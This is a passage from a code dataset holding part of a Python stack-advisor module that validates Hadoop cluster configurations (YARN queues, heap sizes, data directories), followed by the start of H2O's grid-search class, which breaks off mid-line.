value for %s\" % propertyName1)\n value2 = properties2.get(propertyName2)\n if value2 is None and not emptyAllowed:\n return self.getErrorItem(\"Empty value for %s\" % propertyName2)\n if value1 != value2:\n return self.getWarnItem(\"It is recommended to set equal values \"\n \"for properties {0} and {1}\".format(propertyName1, propertyName2))\n\n return None\n\n def validatorEqualsToRecommendedItem(self, properties, recommendedDefaults,\n propertyName):\n if not propertyName in properties:\n return self.getErrorItem(\"Value should be set for %s\" % propertyName)\n value = properties.get(propertyName)\n if not propertyName in recommendedDefaults:\n return self.getErrorItem(\"Value should be recommended for %s\" % propertyName)\n recommendedValue = recommendedDefaults.get(propertyName)\n if value != recommendedValue:\n return self.getWarnItem(\"It is recommended to set value {0} \"\n \"for property {1}\".format(recommendedValue, propertyName))\n return None\n\n def validateMinMemorySetting(self, properties, defaultValue, propertyName):\n if not propertyName in properties:\n return self.getErrorItem(\"Value should be set\")\n if defaultValue is None:\n return self.getErrorItem(\"Config's default value can't be null or undefined\")\n\n value = properties[propertyName]\n if value is None:\n return self.getErrorItem(\"Value can't be null or undefined\")\n try:\n valueInt = to_number(value)\n # TODO: generify for other use cases\n defaultValueInt = int(str(defaultValue).strip())\n if valueInt < defaultValueInt:\n return self.getWarnItem(\"Value is less than the minimum recommended default of -Xmx\" + str(defaultValue))\n except:\n return None\n\n return None\n\n def validatorYarnQueue(self, properties, recommendedDefaults, propertyName, services):\n if propertyName not in properties:\n return self.getErrorItem(\"Value should be set\")\n\n capacity_scheduler_properties, _ = self.getCapacitySchedulerProperties(services)\n leaf_queue_names = self.getAllYarnLeafQueues(capacity_scheduler_properties)\n queue_name = properties[propertyName]\n\n if 
len(leaf_queue_names) == 0:\n return None\n elif queue_name not in leaf_queue_names:\n return self.getErrorItem(\"Queue is not exist or not corresponds to existing YARN leaf queue\")\n\n return None\n\n def recommendYarnQueue(self, services, catalog_name=None, queue_property=None):\n old_queue_name = None\n\n if services and 'configurations' in services:\n configurations = services[\"configurations\"]\n if catalog_name in configurations and queue_property in configurations[catalog_name][\"properties\"]:\n old_queue_name = configurations[catalog_name][\"properties\"][queue_property]\n\n capacity_scheduler_properties, _ = self.getCapacitySchedulerProperties(services)\n leaf_queues = sorted(self.getAllYarnLeafQueues(capacity_scheduler_properties))\n\n if leaf_queues and (old_queue_name is None or old_queue_name not in leaf_queues):\n return leaf_queues.pop()\n elif old_queue_name and old_queue_name in leaf_queues:\n return None\n\n return \"default\"\n\n def validateXmxValue(self, properties, recommendedDefaults, propertyName):\n if not propertyName in properties:\n return self.getErrorItem(\"Value should be set\")\n value = properties[propertyName]\n defaultValue = recommendedDefaults[propertyName]\n if defaultValue is None:\n return self.getErrorItem(\"Config's default value can't be null or undefined\")\n if not checkXmxValueFormat(value) and checkXmxValueFormat(defaultValue):\n # Xmx is in the default-value but not the value, should be an error\n return self.getErrorItem('Invalid value format')\n if not checkXmxValueFormat(defaultValue):\n # if default value does not contain Xmx, then there is no point in validating existing value\n return None\n valueInt = formatXmxSizeToBytes(getXmxSize(value))\n defaultValueXmx = getXmxSize(defaultValue)\n defaultValueInt = formatXmxSizeToBytes(defaultValueXmx)\n if valueInt < defaultValueInt:\n return self.getWarnItem(\"Value is less than the recommended default of -Xmx\" + defaultValueXmx)\n return None\n\n def validateMapReduce2Configurations(self, properties, recommendedDefaults, configurations, services, hosts):\n validationItems = [ {\"config-name\": 'mapreduce.map.java.opts', \"item\": self.validateXmxValue(properties, recommendedDefaults, 'mapreduce.map.java.opts')},\n {\"config-name\": 'mapreduce.reduce.java.opts', \"item\": self.validateXmxValue(properties, recommendedDefaults, 'mapreduce.reduce.java.opts')},\n {\"config-name\": 'mapreduce.task.io.sort.mb', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'mapreduce.task.io.sort.mb')},\n {\"config-name\": 'mapreduce.map.memory.mb', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'mapreduce.map.memory.mb')},\n {\"config-name\": 'mapreduce.reduce.memory.mb', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'mapreduce.reduce.memory.mb')},\n {\"config-name\": 'yarn.app.mapreduce.am.resource.mb', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'yarn.app.mapreduce.am.resource.mb')},\n {\"config-name\": 'yarn.app.mapreduce.am.command-opts', \"item\": self.validateXmxValue(properties, recommendedDefaults, 'yarn.app.mapreduce.am.command-opts')},\n {\"config-name\": 'mapreduce.job.queuename', \"item\": self.validatorYarnQueue(properties, recommendedDefaults, 'mapreduce.job.queuename', services)} ]\n return self.toConfigurationValidationProblems(validationItems, \"mapred-site\")\n\n def validateYARNConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):\n 
clusterEnv = getSiteProperties(configurations, \"cluster-env\")\n validationItems = [ {\"config-name\": 'yarn.nodemanager.resource.memory-mb', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'yarn.nodemanager.resource.memory-mb')},\n {\"config-name\": 'yarn.scheduler.minimum-allocation-mb', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'yarn.scheduler.minimum-allocation-mb')},\n {\"config-name\": 'yarn.nodemanager.linux-container-executor.group', \"item\": self.validatorEqualsPropertyItem(properties, \"yarn.nodemanager.linux-container-executor.group\", clusterEnv, \"user_group\")},\n {\"config-name\": 'yarn.scheduler.maximum-allocation-mb', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'yarn.scheduler.maximum-allocation-mb')} ]\n return self.toConfigurationValidationProblems(validationItems, \"yarn-site\")\n\n def validateYARNEnvConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):\n validationItems = [{\"config-name\": 'service_check.queue.name', \"item\": self.validatorYarnQueue(properties, recommendedDefaults, 'service_check.queue.name', services)} ]\n return self.toConfigurationValidationProblems(validationItems, \"yarn-env\")\n\n def validateHbaseEnvConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):\n hbase_site = getSiteProperties(configurations, \"hbase-site\")\n validationItems = [ {\"config-name\": 'hbase_regionserver_heapsize', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'hbase_regionserver_heapsize')},\n {\"config-name\": 'hbase_master_heapsize', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'hbase_master_heapsize')},\n {\"config-name\": \"hbase_user\", \"item\": self.validatorEqualsPropertyItem(properties, \"hbase_user\", hbase_site, \"hbase.superuser\")} ]\n return self.toConfigurationValidationProblems(validationItems, \"hbase-env\")\n\n def validateHDFSConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):\n clusterEnv = getSiteProperties(configurations, \"cluster-env\")\n validationItems = [{\"config-name\": 'dfs.datanode.du.reserved', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'dfs.datanode.du.reserved')},\n {\"config-name\": 'dfs.datanode.data.dir', \"item\": self.validatorOneDataDirPerPartition(properties, 'dfs.datanode.data.dir', services, hosts, clusterEnv)}]\n return self.toConfigurationValidationProblems(validationItems, \"hdfs-site\")\n\n def validateHDFSConfigurationsEnv(self, properties, recommendedDefaults, configurations, services, hosts):\n validationItems = [ {\"config-name\": 'namenode_heapsize', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'namenode_heapsize')},\n {\"config-name\": 'namenode_opt_newsize', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'namenode_opt_newsize')},\n {\"config-name\": 'namenode_opt_maxnewsize', \"item\": self.validatorLessThenDefaultValue(properties, recommendedDefaults, 'namenode_opt_maxnewsize')}]\n return self.toConfigurationValidationProblems(validationItems, \"hadoop-env\")\n\n def validatorOneDataDirPerPartition(self, properties, propertyName, services, hosts, clusterEnv):\n if not propertyName in properties:\n return self.getErrorItem(\"Value should be set\")\n dirs = properties[propertyName]\n\n if not (clusterEnv and \"one_dir_per_partition\" in clusterEnv and 
clusterEnv[\"one_dir_per_partition\"].lower() == \"true\"):\n return None\n\n dataNodeHosts = self.getDataNodeHosts(services, hosts)\n\n warnings = set()\n for host in dataNodeHosts:\n hostName = host[\"Hosts\"][\"host_name\"]\n\n mountPoints = []\n for diskInfo in host[\"Hosts\"][\"disk_info\"]:\n mountPoints.append(diskInfo[\"mountpoint\"])\n\n if get_mounts_with_multiple_data_dirs(mountPoints, dirs):\n # A detailed message can be too long on large clusters:\n # warnings.append(\"Host: \" + hostName + \"; Mount: \" + mountPoint + \"; Data directories: \" + \", \".join(dirList))\n warnings.add(hostName)\n break;\n\n if len(warnings) > 0:\n return self.getWarnItem(\"cluster-env/one_dir_per_partition is enabled but there are multiple data directories on the same mount. Affected hosts: {0}\".format(\", \".join(sorted(warnings))))\n\n return None\n\n \"\"\"\n Returns the list of Data Node hosts.\n \"\"\"\n def getDataNodeHosts(self, services, hosts):\n if len(hosts[\"items\"]) > 0:\n dataNodeHosts = self.getHostsWithComponent(\"HDFS\", \"DATANODE\", services, hosts)\n if dataNodeHosts is not None:\n return dataNodeHosts\n return []\n\n def getMastersWithMultipleInstances(self):\n return ['ZOOKEEPER_SERVER', 'HBASE_MASTER']\n\n def getNotValuableComponents(self):\n return ['JOURNALNODE', 'ZKFC', 'GANGLIA_MONITOR']\n\n def getNotPreferableOnServerComponents(self):\n return ['GANGLIA_SERVER', 'METRICS_COLLECTOR']\n\n def getCardinalitiesDict(self,host):\n return {\n 'ZOOKEEPER_SERVER': {\"min\": 3},\n 'HBASE_MASTER': {\"min\": 1},\n }\n\n def getComponentLayoutSchemes(self):\n return {\n 'NAMENODE': {\"else\": 0},\n 'SECONDARY_NAMENODE': {\"else\": 1},\n 'HBASE_MASTER': {6: 0, 31: 2, \"else\": 3},\n\n 'HISTORYSERVER': {31: 1, \"else\": 2},\n 'RESOURCEMANAGER': {31: 1, \"else\": 2},\n\n 'OOZIE_SERVER': {6: 1, 31: 2, \"else\": 3},\n\n 'HIVE_SERVER': {6: 1, 31: 2, \"else\": 4},\n 'HIVE_METASTORE': {6: 1, 31: 2, \"else\": 4},\n 'WEBHCAT_SERVER': {6: 1, 31: 2, \"else\": 4},\n 'METRICS_COLLECTOR': {3: 2, 6: 2, 31: 3, \"else\": 5},\n }\n\n def get_system_min_uid(self):\n login_defs = '/etc/login.defs'\n uid_min_tag = 'UID_MIN'\n comment_tag = '#'\n uid_min = uid_default = '1000'\n uid = None\n\n if os.path.exists(login_defs):\n with open(login_defs, 'r') as f:\n data = f.read().split('\\n')\n # look for uid_min_tag in file\n uid = filter(lambda x: uid_min_tag in x, data)\n # filter all lines, where uid_min_tag was found in comments\n uid = filter(lambda x: x.find(comment_tag) > x.find(uid_min_tag) or x.find(comment_tag) == -1, uid)\n\n if uid is not None and len(uid) > 0:\n uid = uid[0]\n comment = uid.find(comment_tag)\n tag = uid.find(uid_min_tag)\n if comment == -1:\n uid_tag = tag + len(uid_min_tag)\n uid_min = uid[uid_tag:].strip()\n elif comment > tag:\n uid_tag = tag + len(uid_min_tag)\n uid_min = uid[uid_tag:comment].strip()\n\n # check result for value\n try:\n int(uid_min)\n except ValueError:\n return uid_default\n\n return uid_min\n\n def mergeValidators(self, parentValidators, childValidators):\n for service, configsDict in childValidators.iteritems():\n if service not in parentValidators:\n parentValidators[service] = {}\n parentValidators[service].update(configsDict)\n\n def checkSiteProperties(self, siteProperties, *propertyNames):\n \"\"\"\n Check if properties defined in site properties.\n :param siteProperties: config properties dict\n :param *propertyNames: property names to validate\n :returns: True if all properties defined, in other cases returns False\n \"\"\"\n if 
siteProperties is None:\n return False\n for name in propertyNames:\n if not (name in siteProperties):\n return False\n return True\n\n \"\"\"\n Returns the dictionary of configs for 'capacity-scheduler'.\n \"\"\"\n def getCapacitySchedulerProperties(self, services):\n capacity_scheduler_properties = dict()\n received_as_key_value_pair = True\n if \"capacity-scheduler\" in services['configurations']:\n if \"capacity-scheduler\" in services['configurations'][\"capacity-scheduler\"][\"properties\"]:\n cap_sched_props_as_str = services['configurations'][\"capacity-scheduler\"][\"properties\"][\"capacity-scheduler\"]\n if cap_sched_props_as_str:\n cap_sched_props_as_str = str(cap_sched_props_as_str).split('\\n')\n if len(cap_sched_props_as_str) > 0 and cap_sched_props_as_str[0] != 'null':\n # Received confgs as one \"\\n\" separated string\n for property in cap_sched_props_as_str:\n key, sep, value = property.partition(\"=\")\n capacity_scheduler_properties[key] = value\n Logger.info(\"'capacity-scheduler' configs is passed-in as a single '\\\\n' separated string. \"\n \"count(services['configurations']['capacity-scheduler']['properties']['capacity-scheduler']) = \"\n \"{0}\".format(len(capacity_scheduler_properties)))\n received_as_key_value_pair = False\n else:\n Logger.info(\"Passed-in services['configurations']['capacity-scheduler']['properties']['capacity-scheduler'] is 'null'.\")\n else:\n Logger.info(\"'capacity-schdeuler' configs not passed-in as single '\\\\n' string in \"\n \"services['configurations']['capacity-scheduler']['properties']['capacity-scheduler'].\")\n if not capacity_scheduler_properties:\n # Received configs as a dictionary (Generally on 1st invocation).\n capacity_scheduler_properties = services['configurations'][\"capacity-scheduler\"][\"properties\"]\n Logger.info(\"'capacity-scheduler' configs is passed-in as a dictionary. \"\n \"count(services['configurations']['capacity-scheduler']['properties']) = {0}\".format(len(capacity_scheduler_properties)))\n else:\n Logger.error(\"Couldn't retrieve 'capacity-scheduler' from services.\")\n\n Logger.info(\"Retrieved 'capacity-scheduler' received as dictionary : '{0}'. configs : {1}\" \\\n .format(received_as_key_value_pair, capacity_scheduler_properties.items()))\n return capacity_scheduler_properties, received_as_key_value_pair\n\n \"\"\"\n Gets all YARN leaf queues.\n \"\"\"\n def getAllYarnLeafQueues(self, capacitySchedulerProperties):\n config_list = capacitySchedulerProperties.keys()\n yarn_queues = None\n leafQueueNames = set()\n if 'yarn.scheduler.capacity.root.queues' in config_list:\n yarn_queues = capacitySchedulerProperties.get('yarn.scheduler.capacity.root.queues')\n\n if yarn_queues:\n toProcessQueues = yarn_queues.split(\",\")\n while len(toProcessQueues) > 0:\n queue = toProcessQueues.pop()\n queueKey = \"yarn.scheduler.capacity.root.\" + queue + \".queues\"\n if queueKey in capacitySchedulerProperties:\n # If parent queue, add children\n subQueues = capacitySchedulerProperties[queueKey].split(\",\")\n for subQueue in subQueues:\n toProcessQueues.append(queue + \".\" + subQueue)\n else:\n # Leaf queues\n # We only take the leaf queue name instead of the complete path, as leaf queue names are unique in YARN.\n # Eg: If YARN queues are like :\n # (1). 'yarn.scheduler.capacity.root.a1.b1.c1.d1',\n # (2). 'yarn.scheduler.capacity.root.a1.b1.c2',\n # (3). 
'yarn.scheduler.capacity.root.default,\n # Added leaf queues names are as : d1, c2 and default for the 3 leaf queues.\n leafQueuePathSplits = queue.split(\".\")\n if leafQueuePathSplits > 0:\n leafQueueName = leafQueuePathSplits[-1]\n leafQueueNames.add(leafQueueName)\n return leafQueueNames\n\n def get_service_component_meta(self, service, component, services):\n \"\"\"\n Function retrieve service component meta information as dict from services.json\n If no service or component found, would be returned empty dict\n\n Return value example:\n \"advertise_version\" : true,\n \"bulk_commands_display_name\" : \"\",\n \"bulk_commands_master_component_name\" : \"\",\n \"cardinality\" : \"1+\",\n \"component_category\" : \"CLIENT\",\n \"component_name\" : \"HBASE_CLIENT\",\n \"custom_commands\" : [ ],\n \"decommission_allowed\" : false,\n \"display_name\" : \"HBase Client\",\n \"has_bulk_commands_definition\" : false,\n \"is_client\" : true,\n \"is_master\" : false,\n \"reassign_allowed\" : false,\n \"recovery_enabled\" : false,\n \"service_name\" : \"HBASE\",\n \"stack_name\" : \"HDP\",\n \"stack_version\" : \"2.5\",\n \"hostnames\" : [ \"host1\", \"host2\" ]\n\n :type service str\n :type component str\n :type services dict\n :rtype dict\n \"\"\"\n __stack_services = \"StackServices\"\n __stack_service_components = \"StackServiceComponents\"\n\n if not services:\n return {}\n\n service_meta = [item for item in services[\"services\"] if item[__stack_services][\"service_name\"] == service]\n if len(service_meta) == 0:\n return {}\n\n service_meta = service_meta[0]\n component_meta = [item for item in service_meta[\"components\"] if item[__stack_service_components][\"component_name\"] == component]\n\n if len(component_meta) == 0:\n return {}\n\n return component_meta[0][__stack_service_components]\n\n def is_secured_cluster(self, services):\n \"\"\"\n Detects if cluster is secured or not\n :type services dict\n :rtype bool\n \"\"\"\n return services and \"cluster-env\" in services[\"configurations\"] and\\\n \"security_enabled\" in services[\"configurations\"][\"cluster-env\"][\"properties\"] and\\\n services[\"configurations\"][\"cluster-env\"][\"properties\"][\"security_enabled\"].lower() == \"true\"\n\n def get_services_list(self, services):\n \"\"\"\n Returns available services as list\n\n :type services dict\n :rtype list\n \"\"\"\n if not services:\n return []\n\n return [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]\n\n def get_components_list(self, service, services):\n \"\"\"\n Return list of components for specific service\n :type service str\n :type services dict\n :rtype list\n \"\"\"\n __stack_services = \"StackServices\"\n __stack_service_components = \"StackServiceComponents\"\n\n if not services:\n return []\n\n service_meta = [item for item in services[\"services\"] if item[__stack_services][\"service_name\"] == service]\n if len(service_meta) == 0:\n return []\n\n service_meta = service_meta[0]\n return [item[__stack_service_components][\"component_name\"] for item in service_meta[\"components\"]]\n\n\ndef getOldValue(self, services, configType, propertyName):\n if services:\n if 'changed-configurations' in services.keys():\n changedConfigs = services[\"changed-configurations\"]\n for changedConfig in changedConfigs:\n if changedConfig[\"type\"] == configType and changedConfig[\"name\"]== propertyName and \"old_value\" in changedConfig:\n return changedConfig[\"old_value\"]\n return None\n\n# Validation helper methods\ndef 
getSiteProperties(configurations, siteName):\n siteConfig = configurations.get(siteName)\n if siteConfig is None:\n return None\n return siteConfig.get(\"properties\")\n\ndef getServicesSiteProperties(services, siteName):\n configurations = services.get(\"configurations\")\n if not configurations:\n return None\n siteConfig = configurations.get(siteName)\n if siteConfig is None:\n return None\n return siteConfig.get(\"properties\")\n\ndef to_number(s):\n try:\n return int(re.sub(\"\\D\", \"\", s))\n except ValueError:\n return None\n\ndef checkXmxValueFormat(value):\n p = re.compile('-Xmx(\\d+)(b|k|m|g|p|t|B|K|M|G|P|T)?')\n matches = p.findall(value)\n return len(matches) == 1\n\ndef getXmxSize(value):\n p = re.compile(\"-Xmx(\\d+)(.?)\")\n result = p.findall(value)[0]\n if len(result) > 1:\n # result[1] - is a space or size formatter (b|k|m|g etc)\n return result[0] + result[1].lower()\n return result[0]\n\ndef formatXmxSizeToBytes(value):\n value = value.lower()\n if len(value) == 0:\n return 0\n modifier = value[-1]\n\n if modifier == ' ' or modifier in \"0123456789\":\n modifier = 'b'\n m = {\n modifier == 'b': 1,\n modifier == 'k': 1024,\n modifier == 'm': 1024 * 1024,\n modifier == 'g': 1024 * 1024 * 1024,\n modifier == 't': 1024 * 1024 * 1024 * 1024,\n modifier == 'p': 1024 * 1024 * 1024 * 1024 * 1024\n }[1]\n return to_number(value) * m\n\ndef getPort(address):\n \"\"\"\n Extracts port from the address like 0.0.0.0:1019\n \"\"\"\n if address is None:\n return None\n m = re.search(r'(?:http(?:s)?://)?([\\w\\d.]*):(\\d{1,5})', address)\n if m is not None:\n return int(m.group(2))\n else:\n return None\n\ndef isSecurePort(port):\n \"\"\"\n Returns True if port is root-owned at *nix systems\n \"\"\"\n if port is not None:\n return port < 1024\n else:\n return False\n\ndef getMountPointForDir(dir, mountPoints):\n \"\"\"\n :param dir: Directory to check, even if it doesn't exist.\n :return: Returns the closest mount point as a string for the directory.\n if the \"dir\" variable is None, will return None.\n If the directory does not exist, will return \"/\".\n \"\"\"\n bestMountFound = None\n if dir:\n dir = re.sub(\"^file://\", \"\", dir, count=1).strip().lower()\n\n # If the path is \"/hadoop/hdfs/data\", then possible matches for mounts could be\n # \"/\", \"/hadoop/hdfs\", and \"/hadoop/hdfs/data\".\n # So take the one with the greatest number of segments.\n for mountPoint in mountPoints:\n # Ensure that the mount path and the dir path ends with \"/\"\n # The mount point \"/hadoop\" should not match with the path \"/hadoop1\"\n if os.path.join(dir, \"\").startswith(os.path.join(mountPoint, \"\")):\n if bestMountFound is None:\n bestMountFound = mountPoint\n elif os.path.join(bestMountFound, \"\").count(os.path.sep) < os.path.join(mountPoint, \"\").count(os.path.sep):\n bestMountFound = mountPoint\n\n return bestMountFound\n\ndef getHeapsizeProperties():\n return { \"NAMENODE\": [{\"config-name\": \"hadoop-env\",\n \"property\": \"namenode_heapsize\",\n \"default\": \"1024m\"}],\n \"DATANODE\": [{\"config-name\": \"hadoop-env\",\n \"property\": \"dtnode_heapsize\",\n \"default\": \"1024m\"}],\n \"REGIONSERVER\": [{\"config-name\": \"hbase-env\",\n \"property\": \"hbase_regionserver_heapsize\",\n \"default\": \"1024m\"}],\n \"HBASE_MASTER\": [{\"config-name\": \"hbase-env\",\n \"property\": \"hbase_master_heapsize\",\n \"default\": \"1024m\"}],\n \"HIVE_CLIENT\": [{\"config-name\": \"hive-site\",\n \"property\": \"hive.heapsize\",\n \"default\": \"1024m\"}],\n \"HISTORYSERVER\": 
[{\"config-name\": \"mapred-env\",\n \"property\": \"jobhistory_heapsize\",\n \"default\": \"1024m\"}],\n \"OOZIE_SERVER\": [{\"config-name\": \"oozie-env\",\n \"property\": \"oozie_heapsize\",\n \"default\": \"1024m\"}],\n \"RESOURCEMANAGER\": [{\"config-name\": \"yarn-env\",\n \"property\": \"resourcemanager_heapsize\",\n \"default\": \"1024m\"}],\n \"NODEMANAGER\": [{\"config-name\": \"yarn-env\",\n \"property\": \"nodemanager_heapsize\",\n \"default\": \"1024m\"}],\n \"APP_TIMELINE_SERVER\": [{\"config-name\": \"yarn-env\",\n \"property\": \"apptimelineserver_heapsize\",\n \"default\": \"1024m\"}],\n \"ZOOKEEPER_SERVER\": [{\"config-name\": \"zookeeper-env\",\n \"property\": \"zookeeper_heapsize\",\n \"default\": \"1024m\"}],\n \"METRICS_COLLECTOR\": [{\"config-name\": \"ams-hbase-env\",\n \"property\": \"hbase_master_heapsize\",\n \"default\": \"1024\"},\n {\"config-name\": \"ams-hbase-env\",\n \"property\": \"hbase_regionserver_heapsize\",\n \"default\": \"1024\"},\n {\"config-name\": \"ams-env\",\n \"property\": \"metrics_collector_heapsize\",\n \"default\": \"512\"}],\n \"ATLAS_SERVER\": [{\"config-name\": \"atlas-env\",\n \"property\": \"atlas_server_xmx\",\n \"default\": \"2048\"}]\n }\n\ndef getMemorySizeRequired(components, configurations):\n totalMemoryRequired = 512*1024*1024 # 512Mb for OS needs\n for component in components:\n if component in getHeapsizeProperties().keys():\n heapSizeProperties = getHeapsizeProperties()[component]\n for heapSizeProperty in heapSizeProperties:\n try:\n properties = configurations[heapSizeProperty[\"config-name\"]][\"properties\"]\n heapsize = properties[heapSizeProperty[\"property\"]]\n except KeyError:\n heapsize = heapSizeProperty[\"default\"]\n\n # Assume Mb if no modifier\n if len(heapsize) > 1 and heapsize[-1] in '0123456789':\n heapsize = str(heapsize) + \"m\"\n\n totalMemoryRequired += formatXmxSizeToBytes(heapsize)\n\n return totalMemoryRequired\n\ndef round_to_n(mem_size, n=128):\n return int(round(mem_size / float(n))) * int(n)\n"} {"ext": "py", "sha": "1a2fa11f07440aff970ba75f83f5d80a1d284b01", "content": "# -*- encoding: utf-8 -*-\nfrom __future__ import division, print_function, absolute_import, unicode_literals\n\nimport itertools\n\nimport h2o\nfrom h2o.job import H2OJob\nfrom h2o.frame import H2OFrame\nfrom h2o.exceptions import H2OValueError\nfrom h2o.estimators.estimator_base import H2OEstimator\nfrom h2o.two_dim_table import H2OTwoDimTable\nfrom h2o.display import H2ODisplay\nfrom h2o.grid.metrics import * # NOQA\nfrom h2o.utils.backward_compatibility import backwards_compatible\nfrom h2o.utils.shared_utils import deprecated, quoted\nfrom h2o.utils.compatibility import * # NOQA\nfrom h2o.utils.typechecks import assert_is_type, is_type\n\n\nclass H2OGridSearch(backwards_compatible()):\n \"\"\"\n Grid Search of a Hyper-Parameter Space for a Model\n\n :param model: The type of model to be explored initialized with optional parameters that will be\n unchanged across explored models.\n :param hyper_params: A dictionary of string parameters (keys) and a list of values to be explored by grid\n search (values).\n :param str grid_id: The unique id assigned to the resulting grid object. If none is given, an id will\n automatically be generated.\n :param search_criteria: A dictionary of directives which control the search of the hyperparameter space.\n The default strategy \"Cartesian\" covers the entire space of hyperparameter combinations. 
Specify the\n \"RandomDiscrete\" strategy to get random search of all the combinations of your hyperparameters.\n RandomDiscrete should usually be combined with at least one early stopping criterion: max_models\n and/or max_runtime_secs, e.g::\n\n >>> criteria = {\"strategy\": \"RandomDiscrete\", \"max_models\": 42,\n ... \"max_runtime_secs\": 28800, \"seed\": 1234}\n >>> criteria = {\"strategy\": \"RandomDiscrete\", \"stopping_metric\": \"AUTO\",\n ... \"stopping_tolerance\": 0.001, \"stopping_rounds\": 10}\n >>> criteria = {\"strategy\": \"RandomDiscrete\", \"stopping_rounds\": 5,\n ... \"stopping_metric\": \"misclassification\",\n ... \"stopping_tolerance\": 0.00001}\n :returns: a new H2OGridSearch instance\n\n Examples\n --------\n >>> from h2o.grid.grid_search import H2OGridSearch\n >>> from h2o.estimators.glm import H2OGeneralizedLinearEstimator\n >>> hyper_parameters = {'alpha': [0.01,0.5], 'lambda': [1e-5,1e-6]}\n >>> gs = H2OGridSearch(H2OGeneralizedLinearEstimator(family='binomial'), hyper_parameters)\n >>> training_data = h2o.import_file(\"smalldata/logreg/benign.csv\")\n >>> gs.train(x=range(3) + range(4,11),y=3, training_frame=training_data)\n >>> gs.show()\n \"\"\"\n\n\n def __init__(self, model, hyper_params, grid_id=None, search_criteria=None, export_checkpoints_dir=None):\n super(H2OGridSearch, self).__init__()\n assert_is_type(model, None, H2OEstimator, lambda mdl: issubclass(mdl, H2OEstimator))\n assert_is_type(hyper_params, dict)\n assert_is_type(grid_id, None, str)\n assert_is_type(search_criteria, None, dict)\n if not (model is None or is_type(model, H2OEstimator)): model = model()\n self._id = grid_id\n self.model = model\n self.hyper_params = dict(hyper_params)\n self.search_criteria = None if search_criteria is None else dict(search_criteria)\n self.export_checkpoints_dir = export_checkpoints_dir\n self._grid_json = None\n self.models = None # list of H2O Estimator instances\n self._parms = {} # internal, for object recycle #\n self.parms = {} # external#\n self._future = False # used by __repr__/show to query job state#\n self._job = None # used when _future is True#\n\n\n @property\n def grid_id(self):\n \"\"\"A key that identifies this grid search object in H2O.\"\"\"\n return self._id\n\n @grid_id.setter\n def grid_id(self, value):\n oldname = self.grid_id\n self._id = value\n h2o.rapids('(rename \"{}\" \"{}\")'.format(oldname, value))\n\n\n @property\n def model_ids(self):\n return [i['name'] for i in self._grid_json[\"model_ids\"]]\n\n\n @property\n def hyper_names(self):\n return self._grid_json[\"hyper_names\"]\n\n\n @property\n def failed_params(self):\n return self._grid_json.get(\"failed_params\", None)\n\n\n @property\n def failure_details(self):\n return self._grid_json.get(\"failure_details\", None)\n\n\n @property\n def failure_stack_traces(self):\n return self._grid_json.get(\"failure_stack_traces\", None)\n\n\n @property\n def failed_raw_params(self):\n return self._grid_json.get(\"failed_raw_params\", None)\n\n\n def start(self, x, y=None, training_frame=None, offset_column=None, fold_column=None, weights_column=None,\n validation_frame=None, **params):\n \"\"\"\n Asynchronous model build by specifying the predictor columns, response column, and any\n additional frame-specific values.\n\n To block for results, call :meth:`join`.\n\n :param x: A list of column names or indices indicating the predictor columns.\n :param y: An index or a column name indicating the response column.\n :param training_frame: The H2OFrame having the columns indicated by 
x and y (as well as any\n additional columns specified by fold, offset, and weights).\n :param offset_column: The name or index of the column in training_frame that holds the offsets.\n :param fold_column: The name or index of the column in training_frame that holds the per-row fold\n assignments.\n :param weights_column: The name or index of the column in training_frame that holds the per-row weights.\n :param validation_frame: H2OFrame with validation data to be scored on while training.\n \"\"\"\n self._future = True\n self.train(x=x,\n y=y,\n training_frame=training_frame,\n offset_column=offset_column,\n fold_column=fold_column,\n weights_column=weights_column,\n validation_frame=validation_frame,\n **params)\n\n\n def join(self):\n \"\"\"Wait until grid finishes computing.\"\"\"\n self._future = False\n self._job.poll()\n self._job = None\n\n\n def train(self, x=None, y=None, training_frame=None, offset_column=None, fold_column=None, weights_column=None,\n validation_frame=None, **params):\n \"\"\"\n Train the model synchronously (i.e. do not return until the model finishes training).\n\n To train asynchronously call :meth:`start`.\n\n :param x: A list of column names or indices indicating the predictor columns.\n :param y: An index or a column name indicating the response column.\n :param training_frame: The H2OFrame having the columns indicated by x and y (as well as any\n additional columns specified by fold, offset, and weights).\n :param offset_column: The name or index of the column in training_frame that holds the offsets.\n :param fold_column: The name or index of the column in training_frame that holds the per-row fold\n assignments.\n :param weights_column: The name or index of the column in training_frame that holds the per-row weights.\n :param validation_frame: H2OFrame with validation data to be scored on while training.\n \"\"\"\n algo_params = locals()\n parms = self._parms.copy()\n parms.update({k: v for k, v in algo_params.items() if k not in [\"self\", \"params\", \"algo_params\", \"parms\"]})\n # dictionaries have special handling in grid search, avoid the implicit conversion\n parms[\"search_criteria\"] = None if self.search_criteria is None else str(self.search_criteria)\n parms[\"export_checkpoints_dir\"] = self.export_checkpoints_dir\n parms[\"hyper_parameters\"] = None if self.hyper_params is None else str(self.hyper_params) # unique to grid search\n parms.update({k: v for k, v in list(self.model._parms.items()) if v is not None}) # unique to grid search\n parms.update(params)\n if '__class__' in parms: # FIXME: hackt for PY3\n del parms['__class__']\n y = algo_params[\"y\"]\n tframe = algo_params[\"training_frame\"]\n if tframe is None: raise ValueError(\"Missing training_frame\")\n if y is not None:\n if is_type(y, list, tuple):\n if len(y) == 1:\n parms[\"y\"] = y[0]\n else:\n raise ValueError('y must be a single column reference')\n if x is None:\n if(isinstance(y, int)):\n xset = set(range(training_frame.ncols)) - {y}\n else:\n xset = set(training_frame.names) - {y}\n else:\n xset = set()\n if is_type(x, int, str): x = [x]\n for xi in x:\n if is_type(xi, int):\n if not (-training_frame.ncols <= xi < 